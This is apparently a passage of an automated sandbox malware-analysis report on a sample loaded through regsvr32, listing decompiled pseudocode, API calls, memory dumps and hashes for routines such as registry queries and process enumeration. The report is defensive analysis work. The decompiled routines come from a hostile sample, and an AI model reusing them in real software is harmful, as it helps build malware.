				char* _t42;
				long _t43;

				if(_a4 == 0) {
					L2:
					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
					_t43 = _t26;
					if(_t43 == 0) {
						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E031F2114(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E031F2C11(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						RegCloseKey(_a12);
					}
					L12:
					return _t43;
				}
				_t43 = E031F1863(_a4, _a8, _a12, _a16, _a20, _a24);
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}







                0x031f55f5
                0x031f5618
                0x031f5622
                0x031f5628
                0x031f562c
                0x031f5644
                0x031f5649
                0x031f5691
                0x031f564b
                0x031f5653
                0x031f5657
                0x031f568e
                0x031f5659
                0x031f566b
                0x031f566f
                0x031f5685
                0x031f5671
                0x031f5674
                0x031f5676
                0x031f567b
                0x031f5680
                0x031f5680
                0x031f567b
                0x031f566f
                0x031f5657
                0x031f5699
                0x031f5699
                0x031f56a0
                0x031f56a6
                0x031f56a6
                0x031f560e
                0x031f5612
                0x00000000
                0x00000000
                0x00000000

                APIs
                • RegOpenKeyW.ADVAPI32(80000002,05609BFE,05609BFE), ref: 031F5622
                • RegQueryValueExW.KERNELBASE(05609BFE,?,00000000,80000002,00000000,00000000,?,031F1C57,3D031F90,80000002,031F61AC,00000000,031F61AC,?,05609BFE,80000002), ref: 031F5644
                • RegQueryValueExW.ADVAPI32(05609BFE,?,00000000,80000002,00000000,00000000,00000000,?,031F1C57,3D031F90,80000002,031F61AC,00000000,031F61AC,?,05609BFE), ref: 031F5669
                • RegCloseKey.ADVAPI32(05609BFE,?,031F1C57,3D031F90,80000002,031F61AC,00000000,031F61AC,?,05609BFE,80000002,00000000,?), ref: 031F5699
                  • Part of subcall function 031F1863: SafeArrayDestroy.OLEAUT32(00000000), ref: 031F18E8
                  • Part of subcall function 031F2C11: RtlFreeHeap.NTDLL(00000000,00000000,031F7013,00000000,?,?,00000000), ref: 031F2C1D
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                • String ID:
                • API String ID: 486277218-0
                • Opcode ID: bbeb911c9739d5589e538670d8ea1d613dd47e5b8753aab4f97fdd05de82810c
                • Instruction ID: c3457e204088ce58bed4144acf492f95992d3f542e22dce7b631072d12c93e99
                • Opcode Fuzzy Hash: bbeb911c9739d5589e538670d8ea1d613dd47e5b8753aab4f97fdd05de82810c
                • Instruction Fuzzy Hash: FA211D7640021DBFDF11EE94DC80CEE7BBAEF0D261B058425FE259B120D7319DA09BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCF9EA Relevance: 6.1, APIs: 4, Instructions: 64memoryregistryCOMMON
                Download Yara Rule
                APIs
                • RegQueryValueExA.KERNELBASE(04BDE99E,?,00000000,04BDE99E,00000000,04BDE9AE,04BDE99E,?,?,?,?,04BDA359,80000001,?,04BDE99E,04BDE9AE), ref: 04BCFA0F
                • RtlAllocateHeap.NTDLL(00000000,04BDE9AE,00000000), ref: 04BCFA26
                • HeapFree.KERNEL32(00000000,00000000,?,04BDA359,80000001,?,04BDE99E,04BDE9AE,?,04BCF629,80000001,?,04BDE99E), ref: 04BCFA41
                • RegQueryValueExA.KERNELBASE(04BDE99E,?,00000000,04BDE99E,00000000,04BDE9AE,?,04BDA359,80000001,?,04BDE99E,04BDE9AE,?,04BCF629,80000001), ref: 04BCFA60
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: HeapQueryValue$AllocateFree
                • String ID:
                • API String ID: 4267586637-0
                • Opcode ID: 372d6d3b77a3457671a08c84df207dc848eecac95f44da7a1779150e64048112
                • Instruction ID: 9700efa0b01dfeea2432940b44b18b3fb7c17eade2a78544b0cf85bc1a7a8f77
                • Opcode Fuzzy Hash: 372d6d3b77a3457671a08c84df207dc848eecac95f44da7a1779150e64048112
                • Instruction Fuzzy Hash: DA11FB76900518FFDB12DF99DC84CEEBBBDEB89650B1040AAF901A7150D271AE41DB70
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCFDC6 Relevance: 6.0, APIs: 4, Instructions: 42stringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,04BEE218,00000000,04BC6559,?,04BC3875,?), ref: 04BCFDE5
                • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,04BEE218,00000000,04BC6559,?,04BC3875,?), ref: 04BCFDF0
                • _wcsupr.NTDLL ref: 04BCFDFD
                • lstrlenW.KERNEL32(00000000), ref: 04BCFE05
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                • String ID:
                • API String ID: 2533608484-0
                • Opcode ID: 7c1dcb64ff3782fbfadfafd96e4a0dbc320121465786098b2f92ca503a426779
                • Instruction ID: 308760c00aa9f0daca9b5d7e43b57c3be075eb139d9c988341712645324b2ded
                • Opcode Fuzzy Hash: 7c1dcb64ff3782fbfadfafd96e4a0dbc320121465786098b2f92ca503a426779
                • Instruction Fuzzy Hash: 2AF0E931201612AFA3227A766CC8E7F576DEFC9B66B100DADF505DB081EF68EC0141B1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F2130 Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E031F2130() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x31fa2d8; // 0x240d5a8
						_t2 = _t9 + 0x31fbeb0; // 0x73617661
						_push( &_v264);
						if( *0x31fa118() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}










                0x031f213b
                0x031f2140
                0x031f2145
                0x031f2149
                0x031f2153
                0x031f2184
                0x031f215a
                0x031f215f
                0x031f216c
                0x031f2175
                0x031f218c
                0x031f2177
                0x031f217f
                0x00000000
                0x031f217f
                0x031f218d
                0x031f218e
                0x00000000
                0x031f218e
                0x00000000
                0x031f2188
                0x031f2194
                0x031f2199

                APIs
                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 031F2140
                • Process32First.KERNEL32(00000000,?), ref: 031F2153
                • Process32Next.KERNEL32(00000000,?), ref: 031F217F
                • CloseHandle.KERNEL32(00000000), ref: 031F218E
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                • String ID:
                • API String ID: 420147892-0
                • Opcode ID: fb8c7103d154420057f7b61058c8138c0d6ec1a7a552ac91fc613048d65cd63e
                • Instruction ID: 21d857ceb796bc6ac5cd1b47b100d6edab424bc3043dcf988fe656a352b1b40b
                • Opcode Fuzzy Hash: fb8c7103d154420057f7b61058c8138c0d6ec1a7a552ac91fc613048d65cd63e
                • Instruction Fuzzy Hash: 62F02B3A2041186FC724F6258C48EEB736CEFCD350F050591EB15C6000EB74D69B8AB4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BE3A35 Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON
                Download Yara Rule
                APIs
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04BE3A54
                  • Part of subcall function 04BD87CD: RtlEnterCriticalSection.NTDLL(00000000), ref: 04BD87D9
                  • Part of subcall function 04BD87CD: CloseHandle.KERNEL32(?), ref: 04BD87E7
                  • Part of subcall function 04BD87CD: RtlLeaveCriticalSection.NTDLL(00000000), ref: 04BD8803
                • CloseHandle.KERNEL32(?), ref: 04BE3A62
                • InterlockedDecrement.KERNEL32(04BEE0DC), ref: 04BE3A71
                  • Part of subcall function 04BCE024: SetEvent.KERNEL32(0000053C,04BE3A8C), ref: 04BCE02E
                  • Part of subcall function 04BCE024: CloseHandle.KERNEL32(0000053C), ref: 04BCE043
                  • Part of subcall function 04BCE024: HeapDestroy.KERNELBASE(05E50000), ref: 04BCE053
                • RtlExitUserThread.NTDLL(00000000), ref: 04BE3A8D
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
                • String ID:
                • API String ID: 1141245775-0
                • Opcode ID: 2bf2bf779cfc1a480c6e44682ed833422c00886e092dd5aa6d5991518c94b1f3
                • Instruction ID: d52c784351b81cb82eb38a3a1551d1fb515eabae15f9139014d336e686f8d10b
                • Opcode Fuzzy Hash: 2bf2bf779cfc1a480c6e44682ed833422c00886e092dd5aa6d5991518c94b1f3
                • Instruction Fuzzy Hash: ADF04435540604ABE7056F7A9809A6E3BB8EFC5731F100299F525AB2C1DB74ED018BB1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F36C5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47memorytimeCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E031F36C5(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				void* _t15;
				void* _t20;
				void* _t22;
				void* _t23;
				signed short* _t24;

				_t22 = __edx;
				_t23 = E031F23CC(_t11, _a12);
				if(_t23 == 0) {
					_t20 = 8;
				} else {
					_t24 = _t23 + _a16 * 2;
					 *_t24 =  *_t24 & 0x00000000; // executed
					_t15 = E031F6302(__ecx, _a4, _a8, _t23); // executed
					_t20 = _t15;
					if(_t20 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						 *_t24 = 0x5f;
						_t20 = E031F5173(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
					}
					HeapFree( *0x31fa290, 0, _t23);
				}
				return _t20;
			}










                0x031f36c5
                0x031f36d6
                0x031f36da
                0x031f3733
                0x031f36dc
                0x031f36e3
                0x031f36e9
                0x031f36ed
                0x031f36f2
                0x031f36f6
                0x031f36fc
                0x031f370c
                0x031f371e
                0x031f371e
                0x031f3729
                0x031f3729
                0x031f373a

                APIs
                  • Part of subcall function 031F23CC: lstrlen.KERNEL32(?,00000000,05609B30,00000000,031F3413,05609D0E,69B25F44,?,?,?,?,69B25F44,00000005,031FA010,4D283A53,?), ref: 031F23D3
                  • Part of subcall function 031F23CC: mbstowcs.NTDLL ref: 031F23FC
                  • Part of subcall function 031F23CC: memset.NTDLL ref: 031F240E
                • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,056093D4), ref: 031F36FC
                • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,056093D4), ref: 031F3729
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                • String ID: Ut
                • API String ID: 1500278894-8415677
                • Opcode ID: 2be944133dcec72a93e528b9ec7221ebb38e96dcd150b0ff15b071b3e50e1918
                • Instruction ID: 269a648a8a962f97ebef2def00e52193263dcd7ebc3e047b3d6302e6b5be0576
                • Opcode Fuzzy Hash: 2be944133dcec72a93e528b9ec7221ebb38e96dcd150b0ff15b071b3e50e1918
                • Instruction Fuzzy Hash: 56018F36200209BFDB11AF55DC45E9A7BBDFB88744F000424FB049A150DB71D864CB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC3B19 Relevance: 5.1, APIs: 4, Instructions: 110COMMON
                Download Yara Rule
                APIs
                • memset.NTDLL ref: 04BC3B3F
                • memcpy.NTDLL ref: 04BC3B67
                  • Part of subcall function 04BE3E7D: NtAllocateVirtualMemory.NTDLL(04BD6359,00000000,00000000,04BD6359,00003000,00000040), ref: 04BE3EAE
                  • Part of subcall function 04BE3E7D: RtlNtStatusToDosError.NTDLL(00000000), ref: 04BE3EB5
                  • Part of subcall function 04BE3E7D: SetLastError.KERNEL32(00000000), ref: 04BE3EBC
                • GetLastError.KERNEL32(00000010,00000218,04BE6D9D,00000100,?,00000318,00000008), ref: 04BC3B7E
                • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,04BE6D9D,00000100), ref: 04BC3C61
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
                • String ID:
                • API String ID: 685050087-0
                • Opcode ID: be643f7ae70f09263fec6fcd694988343df923f94c646afbfd3e4eb0f44af196
                • Instruction ID: d1cf42cfa5d943c4b726fe7d1bf9c9d0a27c90df6371af777a4a9c3c4e48f28c
                • Opcode Fuzzy Hash: be643f7ae70f09263fec6fcd694988343df923f94c646afbfd3e4eb0f44af196
                • Instruction Fuzzy Hash: 214185B1544705AFD760DF25CC81FABBBE8EB88314F40896DF999C6250E730E5148B62
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BDA2DD Relevance: 4.6, APIs: 3, Instructions: 73registryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BE41CF: lstrlen.KERNEL32(?,00000000,04BE249E,00000027,04BEE268,?,00000000,?,?,04BE249E,?,00000001,?,04BDA7DD,00000000,?), ref: 04BE4205
                  • Part of subcall function 04BE41CF: lstrcpy.KERNEL32(00000000,00000000), ref: 04BE4229
                  • Part of subcall function 04BE41CF: lstrcat.KERNEL32(00000000,00000000), ref: 04BE4231
                • RegOpenKeyExA.KERNELBASE(04BCF629,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00000000,?,04BCF629,80000001,?,04BDE99E), ref: 04BDA324
                • RegOpenKeyExA.ADVAPI32(04BCF629,04BCF629,00000000,00020019,80000001,?,04BCF629,80000001,?,04BDE99E), ref: 04BDA33A
                • RegCloseKey.ADVAPI32(80000001,80000001,?,04BDE99E,04BDE9AE,?,04BCF629,80000001,?,04BDE99E), ref: 04BDA383
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Open$Closelstrcatlstrcpylstrlen
                • String ID:
                • API String ID: 4131162436-0
                • Opcode ID: 7c444e7c41fa2bbe91b6ffaab39981543a77b7c65a9c531eafd7b0b4629cfc6f
                • Instruction ID: 3a1aa4dca48a1392e5f5254f4abb4c81b94f9150142081a4c499fff2b93b1826
                • Opcode Fuzzy Hash: 7c444e7c41fa2bbe91b6ffaab39981543a77b7c65a9c531eafd7b0b4629cfc6f
                • Instruction Fuzzy Hash: E8215B71900209BFDF00DFA6DDC1CAEBBBDEF48314B0040EAE504A7150E771AE549B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F2638 Relevance: 4.6, APIs: 3, Instructions: 73memorystringCOMMON
                Download Yara Rule
                C-Code - Quality: 79%
                			E031F2638(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				char* _t56;
				char* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 =  &(_t56[_t5]);
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 = StrStrA(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t33 = RtlAllocateHeap( *0x31fa290, 0, _a16 + _t60); // executed
						_t48 = _t33;
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E031F7A9C(_t57 - _a4, _a4, _t48);
							_t38 = E031F7A9C(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E031F7A9C(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}
















                0x031f2640
                0x031f2645
                0x031f2647
                0x031f264e
                0x031f2660
                0x031f2660
                0x031f2664
                0x031f2666
                0x031f2669
                0x031f266c
                0x031f2675
                0x031f267f
                0x031f2683
                0x031f2688
                0x031f2698
                0x031f269e
                0x031f26a2
                0x031f26f1
                0x031f26a4
                0x031f26a4
                0x031f26ad
                0x031f26bc
                0x031f26c1
                0x031f26ce
                0x031f26d7
                0x031f26e2
                0x031f26e9
                0x031f26ed
                0x031f26ed
                0x031f26a2
                0x031f26f8
                0x031f26ff

                APIs
                • lstrlen.KERNEL32(74E5F710,?,00000000,?,74E5F710), ref: 031F266C
                • StrStrA.SHLWAPI(00000000,?), ref: 031F2679
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 031F2698
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: AllocateHeaplstrlen
                • String ID:
                • API String ID: 556738718-0
                • Opcode ID: 550982521b3bbe79b1f544ac0d555b5d4bf48c9f61846edeb42ab90499347e1a
                • Instruction ID: 9a69ea0f902204a2027ee6d737ae02acf9b864bcc533320325fcc185d32d5277
                • Opcode Fuzzy Hash: 550982521b3bbe79b1f544ac0d555b5d4bf48c9f61846edeb42ab90499347e1a
                • Instruction Fuzzy Hash: 31218339600249AFCF01DF6CC884B9EBFB9EF89250F098155ED04AB305D735E956DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F1590 Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                Download Yara Rule
                C-Code - Quality: 47%
                			E031F1590(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E031F2114(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x31f92a4); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                0x031f1594
                0x031f15a1
                0x031f15a3
                0x031f15a4
                0x031f15ac
                0x031f15ac
                0x031f15b0
                0x00000000
                0x00000000
                0x031f15a7
                0x031f15a8
                0x031f15ab
                0x031f15ab
                0x031f15b8
                0x031f15bf
                0x031f15c2
                0x031f15ca
                0x031f15d0
                0x031f15d2
                0x031f15d5
                0x031f15d9
                0x031f15db
                0x031f15de
                0x031f15de
                0x031f15df
                0x031f15e1
                0x031f15de
                0x031f15eb
                0x031f15ee
                0x031f15f1
                0x031f15f4
                0x031f15f4
                0x031f15fb
                0x031f15fb
                0x031f1607

                APIs
                • StrChrA.SHLWAPI(?,00000020,00000000,056095AC,?,?,031F21E5,?,056095AC), ref: 031F15AC
                • StrTrimA.KERNELBASE(?,031F92A4,00000002,?,031F21E5,?,056095AC), ref: 031F15CA
                • StrChrA.SHLWAPI(?,00000020,?,031F21E5,?,056095AC), ref: 031F15D5
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: Trim
                • String ID:
                • API String ID: 3043112668-0
                • Opcode ID: 614403ed7bd8cffbcc513ac6cee551227bbe8bfcc3348fdcf8646de022681ada
                • Instruction ID: 01a453c6c78e5e3bd2d4b75c39b1306ddc4f858ae63d38979186bd157ac4844b
                • Opcode Fuzzy Hash: 614403ed7bd8cffbcc513ac6cee551227bbe8bfcc3348fdcf8646de022681ada
                • Instruction Fuzzy Hash: E9019E72304305BFE710DA2A8C45F677A9DEB8E641F094021AB5ACB252DB70D842C770
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F6096 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 48COMMON
                Download Yara Rule
                C-Code - Quality: 64%
                			E031F6096(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t14;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t14 = E031F2D2F(_a4, _t26, __edi); // executed
				_t28 = _t14;
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x31fa2d8; // 0x240d5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x31fb4e8; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x31fb8f0; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E031F6CFD();
					_push( &_v64);
					if( *0x31fa100() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E031F6CFD();
				}
				return _t28;
			}















                0x031f6096
                0x031f609d
                0x031f60a6
                0x031f60ab
                0x031f60af
                0x031f60b9
                0x031f60be
                0x031f60c3
                0x031f60cb
                0x031f60d2
                0x031f60dc
                0x031f60dc
                0x031f60d4
                0x031f60d4
                0x031f60d4
                0x031f60d4
                0x031f60e2
                0x031f60e8
                0x031f60e9
                0x031f60ec
                0x031f60ef
                0x031f60f2
                0x031f60fa
                0x031f6103
                0x031f610b
                0x031f610b
                0x031f610d
                0x031f610f
                0x031f610f
                0x031f6119

                APIs
                  • Part of subcall function 031F2D2F: SysAllocString.OLEAUT32(00000000), ref: 031F2D8B
                  • Part of subcall function 031F2D2F: SysAllocString.OLEAUT32(0070006F), ref: 031F2D9F
                  • Part of subcall function 031F2D2F: SysAllocString.OLEAUT32(00000000), ref: 031F2DB1
                  • Part of subcall function 031F2D2F: SysFreeString.OLEAUT32(00000000), ref: 031F2E15
                • memset.NTDLL ref: 031F60B9
                • GetLastError.KERNEL32 ref: 031F6105
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: String$Alloc$ErrorFreeLastmemset
                • String ID: <
                • API String ID: 1330562889-4251816714
                • Opcode ID: ae31a181c6a595d329206c22546a342df246f7372b6d3f6154f762b51220fd91
                • Instruction ID: 8f7fa3c36d66172352888309ddaa2db33a17c22ba911a4e7ce5733d4e25daa93
                • Opcode Fuzzy Hash: ae31a181c6a595d329206c22546a342df246f7372b6d3f6154f762b51220fd91
                • Instruction Fuzzy Hash: 77012D75D00218AFCB10FFA9D884ECEBBBCEF0C650F048126FA08EB241D77095418BA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCD0E6 Relevance: 4.5, APIs: 3, Instructions: 40registrystringCOMMON
                Download Yara Rule
                APIs
                • RegCreateKeyA.ADVAPI32(80000001,0624B7F0,?), ref: 04BCD0FB
                • RegOpenKeyA.ADVAPI32(80000001,0624B7F0,?), ref: 04BCD105
                • lstrlen.KERNEL32(0624B7F0,00000000,00000000,04BED06E,?,?,?,04BC902F,00000001,?), ref: 04BCD124
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CreateOpenlstrlen
                • String ID:
                • API String ID: 2865187142-0
                • Opcode ID: f461dfbc9e539ab7d5b143cbf44890e35489362a9f7b08962c9b8be665492fb6
                • Instruction ID: 58713fed7e0c87ace080b8f5daecf55e278875f6033027fbb02aab87fce93366
                • Opcode Fuzzy Hash: f461dfbc9e539ab7d5b143cbf44890e35489362a9f7b08962c9b8be665492fb6
